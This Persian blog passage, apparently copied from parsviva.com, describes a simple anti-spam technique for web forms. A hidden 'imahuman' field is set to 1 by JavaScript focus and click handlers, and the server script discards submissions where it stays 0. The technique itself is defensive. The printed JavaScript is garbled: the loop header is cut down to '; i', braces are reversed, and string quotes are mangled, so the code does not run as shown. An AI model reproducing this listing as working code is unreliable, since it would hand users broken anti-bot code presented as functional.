2 – اگر جاوا اسكريپت فعال نبود، بايد يك جايگزين سريع داشته باشيد.

3 – تمام اين آزمايش‌ها تا حد امكان بايد از چشم كاربر دور بماند.

4 – براي روبوت‌ها فهميدن و دور زدن آزمايش‌هاي شما، كار دشواري نيست.

آيا من انسانم؟

در ابتدا بايد راهي بيابيم كه فرم بتواند جواب سوال «آيا من انسانم؟» را به كد پشت صحنه بفرستد. بدين منظور، من از فيلد پنهان استفاده كردم. لازم به‌ذكر است، بر طبق نكات بالا، نام اين فيلد هر چيزي مي‌تواند باشد. اگر بات‌ها اسم اين فيلد را بدانند، در اين صورت مدار صحيحي از طريق سيستم به آن پاس خواهند داد. ‌ ‌
اين فيلد هرجايي مي‌تواند باشد، اما من قبل از بستن فروم مي‌گذارمش. ‌ ‌



‌function setUpHumanTest() {‌

‌var myforms = document.getElementsByTagName("form") ; ‌

‌; i
‌addEvent(myforms[i], "focus", markAsHuman, false); ‌

‌addEvent(myforms[i], "click", markAsHuman, false); ‌

‌} ‌

‌}‌

‌function markAsHuman() {‌

‌";1document.getElementById("imahuman").value = " ‌

‌}‌

‌var addEvent;‌

‌if (document.addEventListener) {‌

‌addEvent = function(element, type, handler) { ‌

‌element.addEventListener(type, handler, null); ‌

‌if (element.href) element.href="javascript:void(');" ; ‌

{‌‌

{‌

‌else if (document.attachEvent) {‌

‌addEvent = function(element, type, handler) { ‌

‌element.attachEvent("on" + type, handler); ‌

‌if (element.href) element.href="javascript:void(');" ; ‌

{‌‌

{‌

‌else {‌

‌ addEvent = new Function; ‌

‌}‌

حال از بالا به پايين آن را شرح مي‌دهيم.

– خط آخر به اين معني است كه كافي است يك دستور ‌addEvent‌ را اجرا كنيد و كار را تمام كنيد.

– تابع ‌markAsHuman‌ وقتي صدا زده مي‌شود كه ما گمان مي‌كنيم كاربر يك انسان است. اين تابع مقدار فيلد پنهان ما را از صفر به يك تغيير مي‌دهد.

– تابع ‌setUpHumanTest‌ در حقيقت تمام صفحه را بررسي مي‌كند و 2كنترل كننده جاوااسكريپت به فرم اضافه مي‌كند.

1– اگر فرم داراي ‌focus‌ بود (در حال انجام عمليات، در اين‌صورت تابع ‌markAsHuman‌ فراخوانده مي‌شود.)

2– اگر رويداد كليك اتفاق افتاد، باز تابع ‌markAsHuman‌ فراخوانده مي‌شود. ‌ ‌

اين رويدادها فقط در صفحه مرورگر اتفاق مي‌افتد، بنابراين هرزنويس‌ها يا كدها قادر به تغيير آن نخواهند بود.

3– با صدا زدن ‌addEvent‌، تابع ‌setUpHumanTest‌ فراخوانده مي‌شود. ‌ ‌

تست نتايج با اسكريپت ‌ ‌

فرم شما به يك اسكريپت ديگر ارسال مي‌شود (كه اين اسكريپت معمولا ‌PHP‌ يا ‌ASP‌ است)، كافي است به اين اسكريپت بگوييد كه هر كجا كه ‌imahuman‌ صفر بود، فرم را در نظر نگيرد. ‌ ‌

برخي از برنامه‌نويسان وانمود مي‌كنند كه اسكريپت كار مي‌كند و بات را به صفحه موفقيت آميز هم مي‌برند، اما كاري كه قرار است را انجام نمي‌دهند و هرزنويس را گول مي‌زنند. البته به عقيده من، اين كار باعث مي‌شود هرزنويس نسبت به توليد هرزنامه تشويق شود و بار اضافي روي سايت ايجاد كند.

منبع: www.parsviva.com

تعداد صفحات : 52

اطلاعات کاربری
  • فراموشی رمز عبور؟
  • آرشیو
    آمار سایت
  • کل مطالب : 517
  • کل نظرات : 0
  • افراد آنلاین : 22
  • تعداد اعضا : 0
  • آی پی امروز : 120
  • آی پی دیروز : 41
  • بازدید امروز : 205
  • باردید دیروز : 105
  • گوگل امروز : 0
  • گوگل دیروز : 0
  • بازدید هفته : 871
  • بازدید ماه : 1,230
  • بازدید سال : 4,351
  • بازدید کلی : 43,474